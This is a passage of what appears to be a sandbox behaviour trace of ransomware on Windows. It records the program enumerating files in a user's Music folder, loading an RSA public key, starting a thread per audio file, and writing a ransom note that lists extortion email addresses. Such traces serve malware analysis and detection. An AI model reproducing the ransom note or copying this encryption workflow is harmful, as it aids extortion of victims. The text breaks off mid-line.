0x0 [0119.234] StrStrW (lpFirst="_iJcWlMQ1CRXwuy.m4a", lpSrch="NTLDR") returned 0x0 [0119.234] StrStrW (lpFirst="_iJcWlMQ1CRXwuy.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0119.234] StrStrW (lpFirst="_iJcWlMQ1CRXwuy.m4a", lpSrch="ntdetect.com") returned 0x0 [0119.234] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0119.234] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0119.234] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned 73 [0119.234] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.234] lstrcpyW (in: lpString1=0x17addc, lpString2="_iJcWlMQ1CRXwuy.m4a" | out: lpString1="_iJcWlMQ1CRXwuy.m4a") returned="_iJcWlMQ1CRXwuy.m4a" [0119.234] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0119.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x564 [0119.234] Sleep (dwMilliseconds=0x96) [0119.393] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0119.393] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 1 [0119.394] FindClose (in: hFindFile=0x3a5650 | out: hFindFile=0x3a5650) returned 0 [0119.394] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0119.394] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*" [0119.394] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="Desktop") returned 0x0 [0119.394] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpSrch="DESKTOP") returned 0x0 [0119.394] SetErrorMode (uMode=0x1) returned 0x1 [0119.394] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_HELP_INSTRUCTION.TXT") returned 90 [0119.394] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0119.394] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0119.394] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x56c) returned 0x0 [0119.394] RegQueryValueExW (in: hKey=0x56c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cbc160, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x3cbc160*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0119.394] RegCloseKey (hKey=0x56c) returned 0x0 [0119.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0119.395] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0119.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0119.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x56c [0119.395] WriteFile (in: hFile=0x56c, lpBuffer=0x17839c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x178394, lpOverlapped=0x0 | out: lpBuffer=0x17839c*, lpNumberOfBytesWritten=0x178394*=0x2c4, lpOverlapped=0x0) returned 1 [0119.396] CloseHandle (hObject=0x56c) returned 1 [0119.396] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3a5650 [0119.396] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0119.396] lstrcpyW (in: lpString1=0x17a5a4, lpString2="9Y_m-oVB2IyYX" | out: lpString1="9Y_m-oVB2IyYX") returned="9Y_m-oVB2IyYX" [0119.396] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0119.396] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0119.396] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.396] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0119.396] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.396] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.396] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.396] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.396] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.396] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.396] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.396] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.397] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.397] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.397] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.397] FindNextFileW (in: hFindFile=0x3a5650, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0119.397] lstrcmpW (lpString1="DqOPM", lpString2="..") returned 1 [0119.397] lstrcmpW (lpString1="DqOPM", lpString2=".") returned 1 [0119.397] lstrcpyW (in: lpString1=0x17b430, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX" [0119.397] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0119.397] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\", lpString2="DqOPM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" [0119.397] SetErrorMode (uMode=0x1) returned 0x1 [0119.397] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM" [0119.397] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0119.397] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0119.397] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*" [0119.397] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\*.*", lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 0x3a5b50 [0119.440] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM") returned="DqOPM" [0119.440] lstrcpyW (in: lpString1=0x179504, lpString2="DqOPM" | out: lpString1="DqOPM") returned="DqOPM" [0119.440] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0119.440] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0119.440] lstrcmpW (lpString1="3vgH.m4a", lpString2="..") returned 1 [0119.440] lstrcmpW (lpString1="3vgH.m4a", lpString2=".") returned 1 [0119.440] StrStrW (lpFirst="3vgH.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0119.440] StrStrW (lpFirst="3vgH.m4a", lpSrch="ntldr") returned 0x0 [0119.440] StrStrW (lpFirst="3vgH.m4a", lpSrch="NTLDR") returned 0x0 [0119.440] StrStrW (lpFirst="3vgH.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0119.440] StrStrW (lpFirst="3vgH.m4a", lpSrch="ntdetect.com") returned 0x0 [0119.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0119.440] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0119.441] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0119.441] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.441] lstrcpyW (in: lpString1=0x179d3c, lpString2="3vgH.m4a" | out: lpString1="3vgH.m4a") returned="3vgH.m4a" [0119.441] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0119.441] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x574 [0119.441] Sleep (dwMilliseconds=0x96) [0119.611] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0119.611] lstrcmpW (lpString1="45 WvgNJuT9AYaRmo.m4a", lpString2="..") returned 1 [0119.611] lstrcmpW (lpString1="45 WvgNJuT9AYaRmo.m4a", lpString2=".") returned 1 [0119.611] StrStrW (lpFirst="45 WvgNJuT9AYaRmo.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0119.611] StrStrW (lpFirst="45 WvgNJuT9AYaRmo.m4a", lpSrch="ntldr") returned 0x0 [0119.611] StrStrW (lpFirst="45 WvgNJuT9AYaRmo.m4a", lpSrch="NTLDR") returned 0x0 [0119.611] StrStrW (lpFirst="45 WvgNJuT9AYaRmo.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0119.611] StrStrW (lpFirst="45 WvgNJuT9AYaRmo.m4a", lpSrch="ntdetect.com") returned 0x0 [0119.611] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0119.611] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0119.611] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0119.611] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.611] lstrcpyW (in: lpString1=0x179d3c, lpString2="45 WvgNJuT9AYaRmo.m4a" | out: lpString1="45 WvgNJuT9AYaRmo.m4a") returned="45 WvgNJuT9AYaRmo.m4a" [0119.611] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0119.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x578 [0119.612] Sleep (dwMilliseconds=0x96) [0119.771] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0119.771] lstrcmpW (lpString1="nvHO8po6UT1lfU646l.mp3", lpString2="..") returned 1 [0119.771] lstrcmpW (lpString1="nvHO8po6UT1lfU646l.mp3", lpString2=".") returned 1 [0119.771] StrStrW (lpFirst="nvHO8po6UT1lfU646l.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0119.771] StrStrW (lpFirst="nvHO8po6UT1lfU646l.mp3", lpSrch="ntldr") returned 0x0 [0119.771] StrStrW (lpFirst="nvHO8po6UT1lfU646l.mp3", lpSrch="NTLDR") returned 0x0 [0119.771] StrStrW (lpFirst="nvHO8po6UT1lfU646l.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0119.771] StrStrW (lpFirst="nvHO8po6UT1lfU646l.mp3", lpSrch="ntdetect.com") returned 0x0 [0119.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="Desktop") returned 0x0 [0119.771] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\", lpSrch="DESKTOP") returned 0x0 [0119.771] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned 79 [0119.772] lstrcpyA (in: lpString1=0x17973c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.772] lstrcpyW (in: lpString1=0x179d3c, lpString2="nvHO8po6UT1lfU646l.mp3" | out: lpString1="nvHO8po6UT1lfU646l.mp3") returned="nvHO8po6UT1lfU646l.mp3" [0119.772] lstrcpyW (in: lpString1=0x17993c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0119.772] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17973c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x588 [0119.772] Sleep (dwMilliseconds=0x96) [0119.922] FindNextFileW (in: hFindFile=0x3a5b50, lpFindFileData=0x17a140 | out: lpFindFileData=0x17a140) returned 1 [0119.922] lstrcmpW (lpString1="oCadhb.wav", lpString2="..") returned 1 [0119.922] lstrcmpW (lpString1="oCadhb.wav", lpString2=".") returned 1 [0119.922] StrStrW (lpFirst="oCadhb.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0119.922] StrStrW (lpFirst="oCadhb.wav", lpSrch="ntldr") returned 0x0 [0119.922] StrStrW (lpFirst="oCadhb.wav", lpSrch="NTLDR") returned 0x0 [0119.922] StrStrW (lpFirst="oCadhb.wav", lpSrch="NTDETECT.COM") returned 0x0 [0119.922] StrStrW (lpFirst="oCadhb.wav", lpSrch="ntdetect.com") returned 0x0 [0119.923] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 